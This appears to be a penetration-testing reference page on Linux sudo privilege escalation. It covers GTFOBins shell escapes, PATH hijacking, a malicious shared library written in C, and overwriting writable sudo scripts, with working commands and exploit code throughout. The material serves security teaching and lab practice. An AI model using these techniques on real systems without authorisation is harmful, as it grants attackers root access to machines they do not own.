Sudo Binaries

Theory

On this page, we speak about vulnerabilities within a sudo binary/script itself. Custom or known binaries/scripts may be exploited and allow us to subvert sudo's intended functionality.

Practice

Known Sudo Binaries Exploits

If the binary is allowed to run as sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

If you find that a binary can be run as sudo, you can check on GTFOBins for known exploits.

$ sudo -l

User demo may run the following commands on crashlab:
    (root): /usr/bin/awk

If you can run a binary with sudo rights, you may want to have look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with awk, we can spawn a shell with following commands:

sudo awk 'BEGIN {system("/bin/sh")}'

No Command Path Exploit

If a sudo binary/script executes another command without specifying the path. We can abuse it and get a privilege escalation.

Note that env_reset and secure_path should not be set !

You may use strings to spot other binaries calls, or do some reverse engineering on the sudo binary.

$ sudo -l
User demo may run the following commands on crashlab:
    (root): /opt/bin/the-sudo-bin

$ strings ./the-sudo-bin
...
find
...

We can create a malicious executable with the same name as the one called by the sudo binary.

echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

Then, set the PATH env variable before executing the Sudo binary.

#Sudo with modified PATH
export PATH=/tmp:$PATH 
./the-sudo-bin

Shared Library Hijacking

If you find some binary with Sudo permissions, you can check if all the .so files are loaded correctly.

strace the-sudo-bin 2>&1 | grep -i -E "open|access|no such file"

You also could check if the Sudo binary is loading a library from a folder where we can write:

# Lets find a Sudo using a non-standard library
ldd the-sudo-bin
something.so => /lib/x86_64-linux-gnu/something.so

# The Sudo also loads libraries from a custom location where we can write
readelf -d the-sudo-bin | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

Alternatively, you could use the strings command to find used shared library

strings ./the-sudo-bin | grep -i '*.so*'

For example, if you find that the Sudo binary doesn't load correctly /home/user/.config/libcalc.so or that you can overwrite it, you can exploit it.

Write a malicious shared library

//Saved to /home/user/.config/libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        printf("Hello from the bad library");
        //setreSudo(0,0,0);
        setuid(0);
        setgid(0);
        system("/bin/bash -p");
}

Compile it

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

Execute the Sudo binary

sudo the-sudo-bin

If you get an error such as

./Sudo_bin: symbol lookup error: ./Sudo_bin: undefined symbol: a_function_name

that means that the library you have generated need to have a function called a_function_name.

Weak File Permissions

If you find some binary/script with Sudo permissions, you could check if you have enought rights to overwrite it. If so, you can replace it by a malicious one.

sudo -l
        (root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py

Check permissions:

ls -la /home/<username>/
ls -la /home/<username>/example.py

If the python script is under a directory that you own, or if you have direct write access on it. We can remove the script and create a new one with the same name.

rm -rf /home/<username>/example.py
touch /home/<username>/example.py

We can insert arbitrary code in the new script. For example,

import os;os.system('/bin/bash')

References

PayloadsAllTheThings/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

TryHackMe | Linux PrivEsc ArenaTryHackMe

Sudo Privilege Escalation | Exploit Noteshideckies

Last updated 7 months ago